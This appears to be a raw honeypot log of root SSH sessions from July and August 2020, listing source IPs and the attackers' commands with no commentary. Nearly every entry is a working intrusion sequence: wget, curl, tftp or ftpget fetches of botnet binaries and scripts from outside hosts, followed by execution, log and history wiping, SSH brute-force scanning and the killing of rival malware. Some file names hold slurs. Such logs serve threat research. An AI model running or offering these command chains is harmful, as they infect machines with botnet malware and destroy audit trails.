10-Jul-2020 17:12:50 ssh2 root w wget ps -x uname -a cat /etc/issue rm -rf /var/log/wtmp rm -rf /var/log/secure rm -rf /var/log/xferlog rm -rf /var/log/messages rm -rf /var/run/utmp touch /var/run/utmp touch /var/log/messages touch /var/log/wtmp touch /var/log/messages touch /var/log/xferlog touch /var/log/secure touch /var/log/lastlog rm -rf /var/log/maillog touch /var/log/maillog history -r unset HISTFILE HISTSAVE HISTMOVE HISTZONE HISTORY HISTLOG USERHOST REMOTEHOST REMOTEUSER echo > /var/run/utmp echo > var/log/wtmp echo > /var/log/lastlog history -c rm -rf .bash_history su root cd ls -a uname -a cd /tmp ls -a nproc set history +o wget apagency.jp/a/bash.tgz tar -xvf bash.tgz rm -rf bash.tgz cd .bash chmod +x * ./go -k history -c wget wget apagency.jp/a/bash.tgz tar -xvf bash.tgz rm -rf bash.tgz cd .bash chmod +x * ./go -k history -c curl From 45.143.221.54 10-Jul-2020 22:31:22 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.143.220.79/kwari.sh; curl -O http://45.143.220.79/kwari.sh; chmod 777 kwari.sh; sh kwari.sh; tftp 45.143.220.79 -c get kwari.sh; chmod 777 kwari.sh; sh kwari.sh; tftp -r kwari2.sh -g 45.143.220.79; chmod 777 kwari2.sh; sh kwari2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.143.220.79 kwari1.sh kwari1.sh; sh kwari1.sh; rm -rf kwari.sh kwari.sh kwari2.sh kwari1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.143.220.79/kwari.sh curl -O http://45.143.220.79/kwari.sh chmod 777 kwari.sh sh kwari.sh tftp 45.143.220.79 -c get kwari.sh chmod 777 kwari.sh sh kwari.sh tftp -r kwari2.sh -g 45.143.220.79 chmod 777 kwari2.sh sh kwari2.sh ftpget -v -u anonymous -p anonymous -P 21 45.143.220.79 kwari1.sh kwari1.sh sh kwari1.sh rm -rf kwari.sh kwari.sh kwari2.sh kwari1.sh rm -rf * From 23.129.64.194 11-Jul-2020 22:37:54 ssh2 root Exec echo 14SGG9JDDG echo 14SGG9JDDG From 45.143.220.79 11-Jul-2020 23:57:36 ssh2 root Exec cd /tmp; wget http://45.143.220.79/bins/FederalAgency.x86; chmod 777 *; ./FederalAgency.x86 ssh rm -rf * cd /tmp wget http://45.143.220.79/bins/FederalAgency.x86 chmod 777 * ./FederalAgency.x86 ssh rm -rf * From 45.95.168.250 12-Jul-2020 11:51:39 ssh2 root Exec wget http://161.35.225.189/bins/jKira.x86; chmod 777 jKira.x86; ./jKira.x86 roots wget http://161.35.225.189/bins/jKira.x86 chmod 777 jKira.x86 ./jKira.x86 roots From 45.143.220.55 13-Jul-2020 09:46:40 ssh2 root Exec cd /tmp; wget http://45.143.220.55/5311qjmikurawepedalnqmashrabotatu rm -fr /root/good/banner.lo rm -fr /root/good/mfu.txt ./boner xjh 22 3500 cat banner.log |grep SSH-2.0-OpenSSH |awk '{print }' |uniq |shuf >> mfu.txt victims=34559 ./brute 9999 -f mfu.tx rm -fr /root/good/banner.log rm -fr /root/good/mfu.txt ./boner xji 22 3500 cat banner.log |grep SSH-2.0-OpenSSH |awk '{print }' |uniq |shuf >> mfu.txt victims=34559 ./brute 9999 -f mfu.txt pass_file 22 cd cd /tmp wget http://45.143.220.55/5311qjmikurawepedalnqmashrabotatu rm -fr /root/good/banner.lo rm -fr /root/good/mfu.txt ./boner xjh 22 3500 cat banner.log |grep SSH-2.0-OpenSSH |awk '{print }' |uniq |shuf >> mfu.txt victims=34559 ./brute 9999 -f mfu.tx rm -fr /root/good/banner.log From 37.49.224.156 14-Jul-2020 09:25:06 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.95.168.230/YesK4Pz9CJ7dQ0EUhkwc3tXSWoR5rB/Meth.x86; cat Meth.x86 > saoas; chmod +x saoas; ./saoas ROOTED; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://45.95.168.230/YesK4Pz9CJ7dQ0EUhkwc3tXSWoR5rB/Meth.x86 cat Meth.x86 > saoas chmod +x saoas ./saoas ROOTED history -c From 193.228.91.11 15-Jul-2020 15:27:44 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.105/ss.sh; curl -O http://193.228.91.105/ss.sh; chmod 777 ss.sh; sh ss.sh; tftp 193.228.91.105 -c get tfJDs1.sh; chmod 777 tfJDs1.sh; sh tfJDs1.sh; tftp -r tftSdvkzb.sh -g 193.228.91.105; chmod 777 tftSdvkzb.sh; sh tftSdvkzb.sh; ftpget -v -u anonymous -p anonymous -P 21 193.228.91.105 ftpSedr1.sh ftpSedr1.sh; sh ftpSedr1.sh; rm -rf ss.sh tfJDs1.sh tftSdvkzb.sh ftpSedr1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://193.228.91.105/ss.sh curl -O http://193.228.91.105/ss.sh chmod 777 ss.sh sh ss.sh tftp 193.228.91.105 -c get tfJDs1.sh chmod 777 tfJDs1.sh sh tfJDs1.sh tftp -r tftSdvkzb.sh -g 193.228.91.105 chmod 777 tftSdvkzb.sh sh tftSdvkzb.sh ftpget -v -u anonymous -p anonymous -P 21 193.228.91.105 ftpSedr1.sh ftpSedr1.sh sh ftpSedr1.sh rm -rf ss.sh tfJDs1.sh tftSdvkzb.sh ftpSedr1.sh rm -rf * From 34.96.128.247 16-Jul-2020 15:47:41 ssh2 root Exec cat /etc/issue ; cd /tmp ; wget 178.62.34.137/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 178.62.34.137/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c cat /etc/issue cd /tmp wget 178.62.34.137/bot.pl perl bot.pl rm -rf bot.pl curl -O 178.62.34.137/bot.pl perl bot.pl rm -rf bot.pl history -c From 51.75.52.118 18-Jul-2020 10:07:27 ssh2 root Exec echo KSH2XK369K echo KSH2XK369K From 145.239.1.182 18-Jul-2020 12:07:00 ssh2 root Exec echo 91QSNDPHCV echo 91QSNDPHCV From 77.247.181.163 19-Jul-2020 01:56:03 ssh2 root Exec echo 2GCJWTGPYH echo 2GCJWTGPYH From 82.78.158.146 19-Jul-2020 07:07:36 ssh2 root ls w cd /tmp wget nasapaul.com/ninfo nproc From 82.78.158.146 19-Jul-2020 07:08:30 ssh2 root ps -x ls perl test.pl apt-get apt-get install perl -y apt-get install perl -y install perl -y perl -y -y install perl -y install perl -y perl -y -y perl -y install perl -y perl -y -y -y install perl -y ls perl test.pl ./network.pl clear reboot cd clear From 82.78.158.146 19-Jul-2020 07:10:49 ssh2 root ls cat network.pl cat test1.pl ls -a clear ls -a .bash_history cat .bash_history halt kill -9 -1 From 129.232.217.205 19-Jul-2020 08:55:50 ssh2 root Exec cat /etc/issue ; cd /tmp ; wget 129.232.217.205/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 129.232.217.205/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c cat /etc/issue cd /tmp wget 129.232.217.205/bot.pl perl bot.pl rm -rf bot.pl curl -O 129.232.217.205/bot.pl perl bot.pl rm -rf bot.pl history -c From 23.129.64.190 19-Jul-2020 09:19:58 ssh2 root Exec echo FXMK7ZQUJD echo FXMK7ZQUJD From 104.42.168.203 19-Jul-2020 14:43:10 ssh2 root Exec cat /etc/issue ; cd /tmp ; wget 104.42.168.203/bot.pl ; curl -O 104.42.168.203 ; perl bot.pl ; rm -rf bot* ; history -c ; echo nite was here <3 cat /etc/issue cd /tmp wget 104.42.168.203/bot.pl curl -O 104.42.168.203 perl bot.pl rm -rf bot* history -c echo nite was here <3 From 107.187.122.10 20-Jul-2020 16:15:34 ssh2 root Exec cat /etc/issue ; cd /tmp ; wget 105.29.64.133/bot.pl ; curl -O 105.29.64.133 ; perl bot.pl ; rm -rf bot* ; history -c ; echo nite was here <3 > nitewasherenigga cat /etc/issue cd /tmp wget 105.29.64.133/bot.pl curl -O 105.29.64.133 perl bot.pl rm -rf bot* history -c echo nite was here <3 > nitewasherenigga From 209.141.47.92 20-Jul-2020 20:36:22 ssh2 root Exec wget http://185.132.53.130/bins/x86; chmod 777 x86; ./x86 x86 wget http://185.132.53.130/bins/x86 chmod 777 x86 ./x86 x86 From 31.159.234.199 21-Jul-2020 04:27:56 ssh2 root w uname -a ps -x ip r ifconfig rm -rf /var/log/wtmp rm -rf /var/log/secure rm -rf /var/log/xferlog rm -rf /var/log/messages rm -rf /var/run/utmp touch /var/run/utmp touch /var/log/messages touch /var/log/wtmp touch /var/log/messages touch /var/log/xferlog touch /var/log/secure touch /var/log/lastlog rm -rf /var/log/maillog touch /var/log/maillog history -r unset HISTFILE HISTSAVE HISTMOVE HISTZONE HISTORY HISTLOG USERHOST REMOTEHOST REMOTEUSER echo > /var/run/utmp echo > var/log/wtmp echo > /var/log/lastlog history -c rm -rf .bash_history passwd wget ips.originbreak.fail/auto.jpg tar xzvf auto.jpg cd .random mv -- linux -sh ./autorun cd .. rm -rf auto.jpg wget ips.originbreak.fail/auto.jpg curl ftp -v lwp-download cat /etc/issue From 104.42.168.203 21-Jul-2020 19:52:55 ssh2 root Exec cat /etc/issue ; cd /tmp ; wget 105.29.64.133/bot.pl ; curl -O 105.29.64.133 ; perl bot.pl ; rm -rf bot* ; history -c ; echo nite was here <3 cat /etc/issue cd /tmp wget 105.29.64.133/bot.pl curl -O 105.29.64.133 perl bot.pl rm -rf bot* history -c echo nite was here <3 From 194.34.132.19 22-Jul-2020 07:54:36 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://107.189.10.184/axisbins.sh; chmod 777 axisbins.sh; sh axisbins.sh; rm -rf axisbins.sh;rm -rf *; clear;history -c; clear;history -w cd /tmp || cd /run || cd / wget http://107.189.10.184/axisbins.sh chmod 777 axisbins.sh sh axisbins.sh rm -rf axisbins.sh rm -rf * clear history -c clear history -w From 185.162.235.163 22-Jul-2020 10:05:18 ssh2 root Exec cd /tmp; wget http://185.63.253.26/christianmingle.x86; chmod 777 christianmingle.x86; ./christianmingle.x86 servers; rm -rf * cd /tmp wget http://185.63.253.26/christianmingle.x86 chmod 777 christianmingle.x86 ./christianmingle.x86 servers rm -rf * From 113.109.247.66 28-Jul-2020 00:29:18 ssh2 root Exec echo "cd /tmp; rm -f *.sh; wget http://46.246.43.212/wget.sh || curl http://46.246.43.212/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh echo "cd /tmp rm -f *.sh wget http://46.246.43.212/wget.sh || curl http://46.246.43.212/curl.sh -o curl.sh chmod +x *.sh ./wget.sh ./curl.sh" | sh From 185.132.53.123 28-Jul-2020 05:32:27 ssh2 root Exec wget http://185.132.53.2/bin.sh; chmod 777 bin.sh; sh bin.sh ; rm -rf bin.sh wget http://185.132.53.2/bin.sh chmod 777 bin.sh sh bin.sh rm -rf bin.sh From 206.189.196.222 28-Jul-2020 14:14:33 ssh2 root Exec wget http://185.132.53.2/bins/jKira.x86; chmod 777 jKira.x86; ./jKira.x86 roots wget http://185.132.53.2/bins/jKira.x86 chmod 777 jKira.x86 ./jKira.x86 roots From 194.180.224.130 29-Jul-2020 04:03:31 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.110/netlab.sh; curl -O http://193.228.91.110/netlab.sh; chmod 777 netlab.sh; sh netlab.sh; tftp 193.228.91.110 -c get netlab.sh; chmod 777 netlab.sh; sh netlab.sh; tftp -r netlab2.sh -g 193.228.91.110; chmod 777 netlab2.sh; sh netlab2.sh; ftpget -v -u anonymous -p anonymous -P 21 193.228.91.110 netlab1.sh netlab1.sh; sh netlab1.sh; ftpget -v -u anonymous -p anonymous -P 21 193.228.91.110 netlab1.sh netlab1.sh; sh netlab1.sh; rm -rf netlab.sh netlab.sh netlab2.sh netlab1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://193.228.91.110/netlab.sh curl -O http://193.228.91.110/netlab.sh chmod 777 netlab.sh sh netlab.sh tftp 193.228.91.110 -c get netlab.sh chmod 777 netlab.sh sh netlab.sh tftp -r netlab2.sh -g 193.228.91.110 chmod 777 netlab2.sh sh netlab2.sh ftpget -v -u anonymous -p anonymous -P 21 193.228.91.110 netlab1.sh netlab1.sh sh netlab1.sh ftpget -v -u anonymous -p anonymous -P 21 193.228.91.110 netlab1.sh netlab1.sh sh netlab1.sh rm -rf netlab.sh netlab.sh netlab2.sh netlab1.sh rm -rf * From 110.87.24.30 30-Jul-2020 20:38:50 ssh2 root Exec echo "cd /tmp; rm -f *.sh; wget http://46.246.44.216/wget.sh || curl http://46.246.44.216/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh echo "cd /tmp rm -f *.sh wget http://46.246.44.216/wget.sh || curl http://46.246.44.216/curl.sh -o curl.sh chmod +x *.sh ./wget.sh ./curl.sh" | sh From 37.49.224.156 30-Jul-2020 23:40:31 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://37.49.230.128/taevimncorufglbzhwxqpdkjs/Meth.x86; cat Meth.x86 > sn0rt; chmod +x sn0rt; ./sn0rt ROOTED; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://37.49.230.128/taevimncorufglbzhwxqpdkjs/Meth.x86 cat Meth.x86 > sn0rt chmod +x sn0rt ./sn0rt ROOTED history -c From 54.225.27.67 31-Jul-2020 03:31:02 ssh2 root Exec echo "cd /tmp; rm -f *.sh; wget http://46.246.44.213/wget.sh || curl http://46.246.44.213/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh echo "cd /tmp rm -f *.sh wget http://46.246.44.213/wget.sh || curl http://46.246.44.213/curl.sh -o curl.sh chmod +x *.sh ./wget.sh ./curl.sh" | sh From 107.187.122.10 31-Jul-2020 03:52:59 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /run || cd /; wget http://93.114.82.21/nitebins.sh; chmod 777 nitebins.sh; sh nitebins.sh; tftp 93.114.82.21 -c get nitetftp1.sh; chmod 777 nitetftp1.sh; sh nitetftp1.sh; tftp -r nitetftp2.sh -g 93.114.82.21; chmod 777 nitetftp2.sh; sh nitetftp2.sh; rm -rf nitebins.sh nitetftp1.sh nitetftp2.sh; rm -rf * cat /etc/issue cd /tmp || cd /run || cd / wget http://93.114.82.21/nitebins.sh chmod 777 nitebins.sh sh nitebins.sh tftp 93.114.82.21 -c get nitetftp1.sh chmod 777 nitetftp1.sh sh nitetftp1.sh tftp -r nitetftp2.sh -g 93.114.82.21 chmod 777 nitetftp2.sh sh nitetftp2.sh rm -rf nitebins.sh nitetftp1.sh nitetftp2.sh rm -rf * From 45.156.187.150 31-Jul-2020 11:48:24 ssh2 root Exec cd /tmp; wget http://94.100.28.201/x-8.6-.GHOUL; chmod 777 *; ./x-8.6-.GHOUL roots; rm -rf * cd /tmp wget http://94.100.28.201/x-8.6-.GHOUL chmod 777 * ./x-8.6-.GHOUL roots rm -rf * From 37.49.224.156 1-Aug-2020 12:56:13 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://37.49.224.189/taevimncorufglbzhwxqpdkjs/Meth.x86; cat Meth.x86 > sn0rt; chmod +x sn0rt; ./sn0rt ROOTED; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://37.49.224.189/taevimncorufglbzhwxqpdkjs/Meth.x86 cat Meth.x86 > sn0rt chmod +x sn0rt ./sn0rt ROOTED history -c From 107.187.122.10 2-Aug-2020 13:43:07 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /run || cd /; wget http://93.114.82.21/nitebins.sh; chmod 777 nitebins.sh; sh nitebins.sh; tftp 93.114.82.21 -c get nitetftp1.sh; chmod 777 nitetftp1.sh; sh nitetftp1.sh; tftp -r nitetftp2.sh -g 93.114.82.21; chmod 777 nitetftp2.sh; sh nitetftp2.sh; rm -rf nitebins.sh nitetftp1.sh nitetftp2.sh; rm -rf * ; cd /tmp ; wget 107.187.122.10/bot.pl ; perl bot.pl ; rm -rf bot* ; curl -O 107.187.122.10/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c cat /etc/issue cd /tmp || cd /run || cd / wget http://93.114.82.21/nitebins.sh chmod 777 nitebins.sh sh nitebins.sh tftp 93.114.82.21 -c get nitetftp1.sh chmod 777 nitetftp1.sh sh nitetftp1.sh tftp -r nitetftp2.sh -g 93.114.82.21 chmod 777 nitetftp2.sh sh nitetftp2.sh rm -rf nitebins.sh nitetftp1.sh nitetftp2.sh rm -rf * cd /tmp wget 107.187.122.10/bot.pl perl bot.pl rm -rf bot* curl -O 107.187.122.10/bot.pl perl bot.pl rm -rf bot* history -c From 34.71.129.32 3-Aug-2020 11:45:41 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://93.114.82.21/nitebins.sh; chmod 777 nitebins.sh; sh nitebins.sh; tftp 93.114.82.21 -c get nitetftp1.sh; chmod 777 nitetftp1.sh; sh nitetftp1.sh; tftp -r nitetftp2.sh -g 93.114.82.21; chmod 777 nitetftp2.sh; sh nitetftp2.sh; rm -rf nitebins.sh nitetftp1.sh nitetftp2.sh; rm -rf * ; cd /tmp ; wget 107.187.122.10/bot.pl ; perl bot.pl ; rm -rf bot* ; curl -O 107.187.122.10/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c cd /tmp || cd /run || cd / wget http://93.114.82.21/nitebins.sh chmod 777 nitebins.sh sh nitebins.sh tftp 93.114.82.21 -c get nitetftp1.sh chmod 777 nitetftp1.sh sh nitetftp1.sh tftp -r nitetftp2.sh -g 93.114.82.21 chmod 777 nitetftp2.sh sh nitetftp2.sh rm -rf nitebins.sh nitetftp1.sh nitetftp2.sh rm -rf * cd /tmp wget 107.187.122.10/bot.pl perl bot.pl rm -rf bot* curl -O 107.187.122.10/bot.pl perl bot.pl rm -rf bot* history -c From 37.49.224.53 3-Aug-2020 12:10:45 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://37.49.224.101/z0z0z/al3x.x86; cat al3x.x86 > z1z2z5a6qw5asda; chmod +x z1z2z5a6qw5asda; ./z1z2z5a6qw5asda Rooted.VPS; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://37.49.224.101/z0z0z/al3x.x86 cat al3x.x86 > z1z2z5a6qw5asda chmod +x z1z2z5a6qw5asda ./z1z2z5a6qw5asda Rooted.VPS history -c From 194.180.224.103 5-Aug-2020 05:09:06 ssh2 root Exec wget http://193.228.91.124/uih7U8JY7Of7Y8O9d6t68IT67R8y76t7823tg8weuq/pwnNet.x86; chmod 777 *; ./pwnNet.x86 Roots wget http://193.228.91.124/uih7U8JY7Of7Y8O9d6t68IT67R8y76t7823tg8weuq/pwnNet.x86 chmod 777 * ./pwnNet.x86 Roots From 176.31.236.146 6-Aug-2020 04:18:38 ssh2 root Exec echo 2PCR89EKMR echo 2PCR89EKMR From 176.58.77.114 8-Aug-2020 00:24:56 ssh2 root ls free -m From 176.58.77.114 8-Aug-2020 00:25:38 ssh2 root ls mbox From 194.180.224.130 8-Aug-2020 00:39:08 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.15.36.242/8UsA.sh; curl -O http://194.15.36.242/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 194.15.36.242 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 194.15.36.242; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.15.36.242 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://194.15.36.242/8UsA.sh curl -O http://194.15.36.242/8UsA.sh chmod 777 8UsA.sh sh 8UsA.sh tftp 194.15.36.242 -c get t8UsA.sh chmod 777 t8UsA.sh sh t8UsA.sh tftp -r t8UsA2.sh -g 194.15.36.242 chmod 777 t8UsA2.sh sh t8UsA2.sh ftpget -v -u anonymous -p anonymous -P 21 194.15.36.242 8UsA1.sh 8UsA1.sh sh 8UsA1.sh rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh rm -rf * From 194.180.224.103 8-Aug-2020 03:54:19 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /run || cd /; wget http://194.180.224.103/reportandyougaybins.sh; chmod 777 reportandyougaybins.sh; sh reportandyougaybins.sh; tftp 194.180.224.103 -c get reportandyougaytftp1.sh; chmod 777 reportandyougaytftp1.sh; sh reportandyougaytftp1.sh; tftp -r reportandyougaytftp2.sh -g 194.180.224.103; chmod 777 reportandyougaytftp2.sh; sh reportandyougaytftp2.sh; rm -rf reportandyougaybins.sh reportandyougaytftp1.sh reportandyougaytftp2.sh; rm -rf * cat /etc/issue cd /tmp || cd /run || cd / wget http://194.180.224.103/reportandyougaybins.sh chmod 777 reportandyougaybins.sh sh reportandyougaybins.sh tftp 194.180.224.103 -c get reportandyougaytftp1.sh chmod 777 reportandyougaytftp1.sh sh reportandyougaytftp1.sh tftp -r reportandyougaytftp2.sh -g 194.180.224.103 chmod 777 reportandyougaytftp2.sh sh reportandyougaytftp2.sh rm -rf reportandyougaybins.sh reportandyougaytftp1.sh reportandyougaytftp2.sh rm -rf * From 199.193.99.232 8-Aug-2020 09:21:05 ssh2 root Exec cat /proc/cpuinfo | grep name | wc -l cat /proc/cpuinfo | grep name | wc -l Exec uname -a || echo - uname -a || echo - From 194.87.138.44 8-Aug-2020 11:55:06 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://194.15.36.155/loader.sh; chmod 777 loader.sh; sh loader.sh; tftp 194.15.36.155 -c get loaderftp1.sh; chmod 777 loaderftp1.sh; sh loaderftp1.sh; tftp -r loaderftp2.sh -g 194.15.36.155; chmod 777 loaderftp2.sh; sh loaderftp2.sh; rm -rf loader.sh loaderftp1.sh loaderftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://194.15.36.155/loader.sh chmod 777 loader.sh sh loader.sh tftp 194.15.36.155 -c get loaderftp1.sh chmod 777 loaderftp1.sh sh loaderftp1.sh tftp -r loaderftp2.sh -g 194.15.36.155 chmod 777 loaderftp2.sh sh loaderftp2.sh rm -rf loader.sh loaderftp1.sh loaderftp2.sh rm -rf * From 37.49.230.81 8-Aug-2020 14:39:18 ssh2 root Exec cat /etc/issue ; cd /tmp ; wget 185.172.110.186/bins/meerkat.x86 ; chmod 777 meerkat.x86 ; ./meerkat.x86 sploit.x86 ; rm -rf meerkat* ; history -c ; wget 34.72.146.20/bot,pl ; perl bot.pl ; rm -rf bot.pl ; history -c cat /etc/issue cd /tmp wget 185.172.110.186/bins/meerkat.x86 chmod 777 meerkat.x86 ./meerkat.x86 sploit.x86 rm -rf meerkat* history -c wget 34.72.146.20/bot,pl perl bot.pl rm -rf bot.pl history -c From 37.49.230.81 8-Aug-2020 18:44:07 ssh2 root Exec cat /etc/issue ; cd /tmp ; wget 51.161.107.124/bot,pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; cd /tmp; wget http://185.172.110.186/bins/neutrons.x86; curl http://185.172.110.186/bins/neutrons.x86; chmod 777 *; ./neutrons.x86 x86; rm -rf * cat /etc/issue cd /tmp wget 51.161.107.124/bot,pl perl bot.pl rm -rf bot.pl history -c cd /tmp wget http://185.172.110.186/bins/neutrons.x86 curl http://185.172.110.186/bins/neutrons.x86 chmod 777 * ./neutrons.x86 x86 rm -rf * From 194.180.224.130 8-Aug-2020 21:24:59 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.118/netlab.sh; curl -O http://194.180.224.118/netlab.sh; chmod 777 netlab.sh; sh netlab.sh; tftp 194.180.224.118 -c get netlab.sh; chmod 777 netlab.sh; sh netlab.sh; tftp -r netlab2.sh -g 194.180.224.118; chmod 777 netlab2.sh; sh netlab2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.180.224.118 netlab1.sh netlab1.sh; sh netlab1.sh; ftpget -v -u anonymous -p anonymous -P 21 194.180.224.118 netlab1.sh netlab1.sh; sh netlab1.sh; rm -rf netlab.sh netlab.sh netlab2.sh netlab1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://194.180.224.118/netlab.sh curl -O http://194.180.224.118/netlab.sh chmod 777 netlab.sh sh netlab.sh tftp 194.180.224.118 -c get netlab.sh chmod 777 netlab.sh sh netlab.sh tftp -r netlab2.sh -g 194.180.224.118 chmod 777 netlab2.sh sh netlab2.sh ftpget -v -u anonymous -p anonymous -P 21 194.180.224.118 netlab1.sh netlab1.sh sh netlab1.sh ftpget -v -u anonymous -p anonymous -P 21 194.180.224.118 netlab1.sh netlab1.sh sh netlab1.sh rm -rf netlab.sh netlab.sh netlab2.sh netlab1.sh rm -rf * From 88.218.16.235 8-Aug-2020 21:57:24 ssh2 root Exec cd /tmp; wget http://185.206.93.87/x-8.6-.GHOUL; chmod 777 *; ./x-8.6-.GHOUL roots; rm -rf * cd /tmp wget http://185.206.93.87/x-8.6-.GHOUL chmod 777 * ./x-8.6-.GHOUL roots rm -rf * From 194.180.224.103 9-Aug-2020 03:25:51 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.124/pwnInfect.sh; curl -O http://193.228.91.124/pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp 193.228.91.124 -c get pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp -r pwnInfect2.sh -g 193.228.91.124; chmod 777 pwnInfect2.sh; sh pwnInfect2.sh; ftpget -v -u anonymous -p anonymous -P 21 193.228.91.124 pwnInfect1.sh pwnInfect1.sh; sh pwnInfect1.sh; rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh; rm -rf * cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://193.228.91.124/pwnInfect.sh curl -O http://193.228.91.124/pwnInfect.sh chmod 777 pwnInfect.sh sh pwnInfect.sh tftp 193.228.91.124 -c get pwnInfect.sh chmod 777 pwnInfect.sh sh pwnInfect.sh tftp -r pwnInfect2.sh -g 193.228.91.124 chmod 777 pwnInfect2.sh sh pwnInfect2.sh ftpget -v -u anonymous -p anonymous -P 21 193.228.91.124 pwnInfect1.sh pwnInfect1.sh sh pwnInfect1.sh rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh rm -rf * From 45.95.168.212 9-Aug-2020 11:23:33 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://scan.alexr00t3d.com/z0z0z/al3x.x86; cat al3x.x86 > z1z2z5a6qw5asda; chmod +x z1z2z5a6qw5asda; ./z1z2z5a6qw5asda Rooted.VPS; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://scan.alexr00t3d.com/z0z0z/al3x.x86 cat al3x.x86 > z1z2z5a6qw5asda chmod +x z1z2z5a6qw5asda ./z1z2z5a6qw5asda Rooted.VPS history -c From 185.249.199.247 10-Aug-2020 02:25:43 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.87.138.23/GhOul.sh; chmod 777 GhOul.sh; sh GhOul.sh; tftp 194.87.138.23 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 194.87.138.23; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.87.138.23 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf GhOul.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://194.87.138.23/GhOul.sh chmod 777 GhOul.sh sh GhOul.sh tftp 194.87.138.23 -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g 194.87.138.23 chmod 777 tftp2.sh sh tftp2.sh ftpget -v -u anonymous -p anonymous -P 21 194.87.138.23 ftp1.sh ftp1.sh sh ftp1.sh rm -rf GhOul.sh tftp1.sh tftp2.sh ftp1.sh rm -rf * From 2.57.122.186 10-Aug-2020 03:32:10 ssh2 root Exec wget http://79.124.78.143/hoho/cutie.x86; curl -O http://79.124.78.143/hoho/cutie.x86; ./cutie.x86 infn.x86; echo Killing; pkill w.x86; pkill b3astmode.x86; pkill loligang.x86; pkill jKira.x86; pkill 3AvA; pkill java; pkill Scylla; echo InfectedNight4life; wget http://79.124.78.143/hoho/cutie.x86 curl -O http://79.124.78.143/hoho/cutie.x86 ./cutie.x86 infn.x86 echo Killing pkill w.x86 pkill b3astmode.x86 pkill loligang.x86 pkill jKira.x86 pkill 3AvA pkill java pkill Scylla echo InfectedNight4life From 45.95.168.172 10-Aug-2020 05:31:01 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.x86; cat Meth.x86 > sn0rt; chmod +x sn0rt; ./sn0rt ROOTED; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://185.172.110.185/taevimncorufglbzhwxqpdkjs/Meth.x86 cat Meth.x86 > sn0rt chmod +x sn0rt ./sn0rt 